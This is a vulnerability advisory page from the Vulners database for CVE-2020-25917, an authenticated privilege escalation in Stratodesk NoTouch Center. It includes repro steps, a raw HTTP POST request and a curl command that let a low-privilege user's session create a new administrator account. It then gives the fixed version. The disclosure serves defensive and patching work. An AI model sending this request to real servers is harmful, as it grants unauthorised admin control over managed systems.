Vulners
Lucene search
Stratodesk NoTouch Center Privilege Escalation
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | CVE-2020-25917 | 14 Nov 202406:07 | – | circl |
 | Stratodesk Notouch Center Access Control Error Vulnerability | 21 Dec 202000:00 | – | cnnvd |
 | CVE-2020-25917 | 26 Dec 202001:50 | – | cve |
 | CVE-2020-25917 | 26 Dec 202001:50 | – | cvelist |
 | EUVD-2020-18547 | 7 Oct 202500:30 | – | euvd |
 | CVE-2020-25917 | 26 Dec 202002:15 | – | nvd |
 | Design/Logic Flaw | 26 Dec 202002:15 | – | prion |
 | CVE-2020-25917 | 22 May 202515:23 | – | redhatcve |
`Stratodesk NoTouch Center Virtual Appliance is a portal for managing NoTouch clients. It appears that Stratodesk has a partnership with ViewSonic and produced these appliances to support some of their hardware devices as well.
- https://www.stratodesk.com/products/notouch-desktop/virtual-appliance/
- https://www.viewsonic.com/eu/products/desktop-virtualization/SC-T25.php
=Authenticated privilege escalation from low privileged user to admin=
The user management security strategy seems to be just hiding the options in the Web UI from unprivileged users, but they can still call admin-related functions manually. Many different admin requests are available to be called by non-admin users with the root cause being the same. The add user functionality is just the biggest impact demonstration of this issue.
A low privileged user on the platform, for example a user with “helpdesk” privileges (which is level 4 in their system of 1-4 privilege levels with 1=admin), can perform privileged operations including adding a new administrator to the platform.
Repro
1) Create a low privileged user
2) Login as such user and capture this user’s JSESSIONID in the Cookie header
3) Insert your ID in the below request where the JESSIONID data is
4) Login as admin2 and see that you now have admin privileges
POST /easyadmin/user/submitCreateTCUser.do HTTP/1.1
Host: stratodesk-server
Content-Type: application/x-www-form-urlencoded
Content-Length: XX
Cookie: JSESSIONID=[XXXXXXXX...]
func=save&userid=0&name=admin2&fullname=admin2&password=Secret2&seclevel=1
"As cURL command"
curl -i -s -k -X $'POST' \
-H $'Host: stratodesk-server' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: XX' -H $'Cookie: JSESSIONID=XXXXXXXX...' \
-b $'JSESSIONID=XXXXXXXX...' \
--data-binary $'func=save&userid=0&name=admin2&fullname=admin22&password=Secret222&seclevel=1' \
$'https://stratodesk-server/easyadmin/user/submitCreateTCUser.do'
Remediation
Fixed in NoTouch package v4.4.68 (unclear which if any OVA releases contain the updated packages)
CVE-2020-25917
Discovered and disclosed by Jeremy Brown / December 2020
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Dec 2020 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.00295